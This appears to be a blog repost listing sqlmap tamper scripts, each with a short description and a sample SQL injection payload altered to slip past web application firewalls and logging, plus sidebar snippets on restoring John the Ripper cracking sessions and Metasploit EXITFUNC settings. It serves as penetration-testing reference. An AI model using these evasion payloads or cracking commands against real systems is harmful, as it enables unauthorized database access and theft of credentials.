Skip to main content

List of SQLMAP Tamper Scripts

Just re-post one of my visited reference blog post:

Original URL: http://www.forkbombers.com/2016/07/sqlmap-tamper-scripts-update.html



NameDescriptionExample


apostrophemask.pyReplaces apostrophe character with its UTF-8 full width counterpart'1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'


apostrophenullencode.pyReplaces apostrophe character with its illegal double unicode counterpart'1 AND %271%27=%271'


appendnullbyte.pyAppends encoded NULL byte character at the end of payload'1 AND 1=1'


base64encode.pyBase64 all characters in a given payload'MScgQU5EIFNMRUVQKDUpIw=='


between.pyReplaces greater than operator ('>') with 'NOT BETWEEN 0 AND #''1 AND A NOT BETWEEN 0 AND B--'


bluecoat.pyReplaces space character after SQL statement with a valid random blank character.Afterwards replace character = with LIKE operator'SELECT%09id FROM users where id LIKE 1'


chardoubleencode.pyDouble url-encodes all characters in a given payload (not processing already encoded)'%2553%2545%254C%2545%2543%2554%2520%2

546%2549%2545%254C%2544%2520%2546%2552

%254F%254D%2520%2554%2541%2542%254C%2545'


commalesslimit.pyReplaces instances like 'LIMIT M, N' with 'LIMIT N OFFSET M'''LIMIT 3 OFFSET 2''


commalessmid.pyReplaces instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)''MID(VERSION() FROM 1 FOR 1)'


concat2concatws.pyReplaces instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)''CONCAT_WS(MID(CHAR(0),0,0),1,2)'


charencode.pyUrl-encodes all characters in a given payload (not processing already encoded)'%53%45%4C%45%43%54%20%46%49%45%4C%4

4%20%46%52%4F%4D%20%54%41%42%4C%45'


charunicodeencode.pyUnicode-url-encodes non-encoded characters in a given payload (not processing already encoded)'%u0053%u0045%u004C%u0045%u0043%u0054%u

0020%u0046%u0049%u0045%u004C%u0044%u002

0%u0046%u0052%u004F%u004D%u0020%u0054%

u0041%u0042%u004C%u0045'


equaltolike.pyReplaces all occurances of operator equal ('=') with operator 'LIKE''SELECT * FROM users WHERE id LIKE 1'


escapequotes.pySlash escape quotes (' and ")'1\\\\" AND SLEEP(5)#'


greatest.pyReplaces greater than operator ('>') with 'GREATEST' counterpart'1 AND GREATEST(A,B+1)=A'


halfversionedmorekeywords.pyAdds versioned MySQL comment before each keyword"value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT

(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(

/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR

(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0N

ULL#/*!0AND 'QDWa'='QDWa"


ifnull2ifisnull.pyReplaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)''IF(ISNULL(1),2,1)'


modsecurityversioned.pyEmbraces complete query with versioned comment'1 /*!30874AND 2>1*/--'


modsecurityzeroversioned.pyEmbraces complete query with zero-versioned comment'1 /*!00000AND 2>1*/--'


multiplespaces.pyAdds multiple spaces around SQL keywords'1 UNION SELECT foobar'


nonrecursivereplacement.pyReplaces predefined SQL keywords with representations suitable for replacement (e.g. .replace("SELECT", "")) filters'1 UNIOUNIONN SELESELECTCT 2--'


percentage.pyAdds a percentage sign ('%') infront of each character'%S%E%L%E%C%T %F%I%E%L%D %F%R%O%M 

%T%A%B%L%E'


overlongutf8.pyConverts all characters in a given payload (not processing already encoded)'SELECT%C0%AAFIELD%C0%AAFROM%C0%AAT

ABLE%C0%AAWHERE%C0%AA2%C0%BE1'


randomcase.pyReplaces each keyword character with random case value'INseRt'


randomcomments.pyAdd random comments to SQL keywords'I/**/N/**/SERT'


securesphere.pyAppends special crafted string"1 AND 1=1 and '0having'='0having'"


sp_password.pyAppends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs'1 AND 9227=9227-- sp_password'


space2comment.pyReplaces space character (' ') with comments '/**/''SELECT/**/id/**/FROM/**/users'


space2dash.pyReplaces space character (' ') with a dash comment ('--') followed by a random string and a new line ('\n')'1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227'


space2hash.pyReplaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n')'1%23nVNaVoPYeva%0AAND%23ngNvzqu%0A9227

=9227'


space2morehash.pyReplaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n')'1%23ngNvzqu%0AAND%23nVNaVoPYeva%0A%23

lujYFWfv%0A9227=9227'


space2mssqlblank.pyReplaces space character (' ') with a random blank character from a valid set of alternate characters'SELECT%0Eid%0DFROM%07users'


space2mssqlhash.pyReplaces space character (' ') with a pound character ('#') followed by a new line ('\n')'1%23%0AAND%23%0A9227=9227'


space2mysqlblank.pyReplaces space character (' ') with a random blank character from a valid set of alternate characters'SELECT%A0id%0BFROM%0Cusers'


space2mysqldash.pyReplaces space character (' ') with a dash comment ('--') followed by a new line ('\n')'1--%0AAND--%0A9227=9227'


space2plus.pyReplaces space character (' ') with plus ('+')'SELECT+id+FROM+users'


space2randomblank.pyReplaces space character (' ') with a random blank character from a valid set of alternate characters'SELECT%0Did%0DFROM%0Ausers'


symboliclogical.pyReplaces AND and OR logical operators with their symbolic counterparts (&& and ||)"1 %26%26 '1'='1"


unionalltounion.pyReplaces UNION ALL SELECT with UNION SELECT'-1 UNION SELECT'


unmagicquotes.pyReplaces quote character (') with a multi-byte combo %bf%27 together with generic comment at the end (to make it work)'1%bf%27 AND 1=1-- '


uppercase.pyReplaces each keyword character with upper case value'INSERT'


varnish.pyAppend a HTTP header 'X-originating-IP'http://h30499.www3.hp.com/t5/Fortify-Application-S

ecurity/Bypassing-web-application-firewalls-using-HT

TP-headers/ba-p/6418366


versionedkeywords.pyEncloses each non-function keyword with versioned MySQL comment'1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL

*/,CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST

(CURRENT_USER()/*!AS*//*!CHAR*/),CHAR(32)),CH

AR(58,100,114,117,58))#


versionedmorekeywords.pyEncloses each keyword with versioned MySQL comment'1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL

*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFN

ULL*/(CAST(/*!CURRENT_USER*/()/*!AS*//*!CHAR*

/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#'


xforwardedfor.pyAppend a fake HTTP header 'X-Forwarded-For'' headers["X-Forwarded-For"]'

Comments

Post a Comment

Popular posts from this blog

Create a session & restore abort/interrupted session in John The Ripper!

Been busy with report writing. Just wanna put some of these command and technique on how to restore interrupted session or aborted session in John The Ripper. 1. First step crack the hash with these commands : john --session=test --format=raw-sha --incremental=rockyou test.txt 2. To restore the abort /interrupted session that you wanted to resume just run these commands : john --restore=test Check the "test.log" Note:  Make sure that these file are not delete " .rec " and " .log " files if the file is deleted or missing it wont work. That's all happy cracking!
Post a Comment
Read more

MSF ::EXITFUNC::

Quick note about MSF EXITFUNC. So what is EXITFUNC? EXITFUNC option is set to 'thread' by default, and it works fine in most cases, so we don't usually look into it much. But in some situations specifying a different EXITFUNC is necessary so that you can have a clean exit from the exploited box. There are 3 different values for EXITFUNC: THREAD: This method is used in most exploitation scenarios where the exploited process (e.g. IE) runs the shellcode in a sub-thread and exiting this thread results in a working application/system (clean exit) PROCESS: This method should be used with multi/handler. This method should also be used with any exploit where a master process restarts it on exit. SEH: This method should be used when there is a structured exception handler (SEH) that will restart the thread or process automatically when an error occurs. Might be useful when we wanted to generate a payload with MSFVENOM.
Post a Comment
Read more